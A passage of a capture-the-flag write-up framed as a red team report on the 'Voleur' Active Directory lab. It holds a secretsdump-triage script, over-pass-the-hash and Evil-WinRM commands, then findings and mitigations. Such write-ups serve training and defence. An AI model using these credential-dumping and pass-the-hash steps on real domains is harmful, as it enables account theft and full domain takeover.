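        "crack_candidates": [a["user"] for a in accounts
                             if not a["is_machine"] and a["nt"] != BLANK_NT and a["rid"] != 502],
    }


# Constructed sample in secretsdump's format; hashes and the two named users are invented.
SAMPLE_DUMP = [
    "[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)",
    "Administrator:500:" + EMPTY_LM + ":e656" + "0" * 28 + ":::",
    "Guest:501:" + EMPTY_LM + ":" + BLANK_NT + ":::",
    "krbtgt:502:" + EMPTY_LM + ":" + "1" * 32 + ":::",
    "voleur.htb\\alice.example:1104:" + EMPTY_LM + ":" + "2" * 32 + ":::",
    "voleur.htb\\bob.example:1105:" + EMPTY_LM + ":" + "2" * 32 + ":::",
    "DC$:1000:" + EMPTY_LM + ":" + "3" * 32 + ":::",
]


def triage_sample():
    return triage(SAMPLE_DUMP)


if __name__ == "__main__":
    for key, value in triage_sample().items():
        print(f"{key}: {value}")
```

The krbtgt hash is deliberately left out of crack_candidates: it is not meant to be cracked, it is meant to be rotated (twice) after a dump like this, because anyone holding it can mint tickets for any principal in the domain.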

Administrative Access

Using the Administrator's NT hash, the red team requested a Kerberos ticket directly (over-pass-the-hash: getTGT uses the NT hash as the RC4-HMAC key for the AS exchange, so the plaintext password is never needed):

$ impacket-getTGT -hashes :e656**************************** -dc-ip 10.10.11.76 voleur.htb/administrator
$ export KRB5CCNAME=administrator.ccache

An Evil-WinRM session was established as the Administrator:

$ evil-winrm -i dc.voleur.htb -k -u administrator -r VOLEUR.HTB

Navigating to the Administrator’s desktop, the team retrieved the root.txt flag:

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

Directory: C:\Users\Administrator\Desktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/29/2025 1:12 AM 2308 Microsoft Edge.lnk
-ar--- 7/6/2025 3:23 AM 34 root.txt

This completed the second objective of the assessment.

Findings and Recommendations

The following vulnerabilities were identified during the assessment, along with their impacts and recommended mitigations.

Finding 1: Plaintext Credentials in a Weakly Protected Document
  Description: Access_Review.xlsx listed service account passwords in plaintext and was protected only with the password football1. The hash shows Office 2013 encryption with a 100,000-iteration KDF, which is sound; the password, not the algorithm, was the weakness, and rockyou.txt recovered it.
  Impact: Exposed the svc_ldap, svc_iis and todd.wolfe passwords, which drove every later step of the compromise.
  Recommendation: Do not store credentials in documents or on file shares; keep them in a vault with per-account access. Where a document must be encrypted, enforce a long passphrase, because document encryption is only as strong as the password protecting it.

Finding 2: Excessive Permissions on Service Accounts
  Description: svc_ldap held GenericWrite on lacey.miller and WriteSPN on svc_winrm, and was a member of RESTORE_USERS.
  Impact: Allowed targeted Kerberoasting (svc_winrm's password was cracked from the resulting ticket) and the restoration of the deleted todd.wolfe account, whose archived profile then yielded further credentials.
  Recommendation: Review and restrict service account rights to the principle of least privilege; audit Active Directory ACLs regularly with tools like BloodHound. Give accounts that can be assigned SPNs long random passwords (or use group Managed Service Accounts) so that roasted tickets do not crack.

Finding 3: Inadequate Monitoring
  Description: High-impact actions, including SPN writes on other accounts, the restoration of a deleted user, and bulk reads of backup data, produced no visible response.
  Impact: Enabled the red team to perform privileged changes without triggering alerts.
  Recommendation: Enable directory service change auditing and alert on servicePrincipalName modifications, object restorations and access to sensitive shares; forward the events to a SIEM.

Finding 4: Unsecured Backups and Archived Profiles
  Description: A copy of ntds.dit with the SYSTEM and SECURITY hives sat on the IT share, reachable through WSL with an SSH private key that was itself stored on the share; an archived user profile on the same share retained DPAPI-protected saved credentials.
  Impact: Allowed offline extraction of every domain hash, including Administrator and krbtgt, leading to full administrative compromise.
  Recommendation: Treat domain controller backups as Tier 0 assets: store them encrypted in an isolated, access-restricted location and audit access. Remove private keys and archived profiles from general-purpose shares. After a dump of ntds.dit, rotate the krbtgt password twice and reset the exposed accounts.

Conclusion

The red team assessment of the Voleur domain revealed critical vulnerabilities in the Active Directory environment, including weak passwords, excessive permissions, inadequate monitoring, and unsecured backup files. These issues allowed the red team to gain initial access, escalate privileges, and achieve full administrative control, retrieving both the user and root flags.

These findings underscore the importance of robust security practices in Active Directory environments. By implementing the recommended mitigations—strong password policies, least privilege principles, enhanced monitoring, and secure backup management—the organization can significantly reduce the risk of similar attacks. Regular security assessments and proactive vulnerability management are essential to maintaining a strong security posture.

Appendices

Tools Used

  • Nmap: For network scanning and service enumeration.
  • NetExec (nxc): For authenticated SMB user enumeration over Kerberos.
  • Impacket (getTGT, smbclient, dpapi, secretsdump): For Kerberos authentication, SMB access, DPAPI decryption and credential extraction from the Active Directory backup.
  • office2john and John the Ripper: For extracting and cracking the Excel document hash and the Kerberoast hashes.
  • BloodHound (bloodhound-python collector): For Active Directory relationship mapping.
  • targetedKerberoast: For SPN-write-based Kerberoasting.
  • Evil-WinRM: For remote Windows management.
  • RunasCs: For obtaining a shell as svc_ldap on the domain controller.
  • OpenSSH and scp: For access to the WSL instance and transfer of the backup files.

The assessment was conducted within the scope of the lab. The changes made to the environment along the way (the C:\Tools directory and RunasCs.exe upload, the temporary SPNs written by targetedKerberoast, and the restored todd.wolfe object) are recorded above so that they can be reverted.
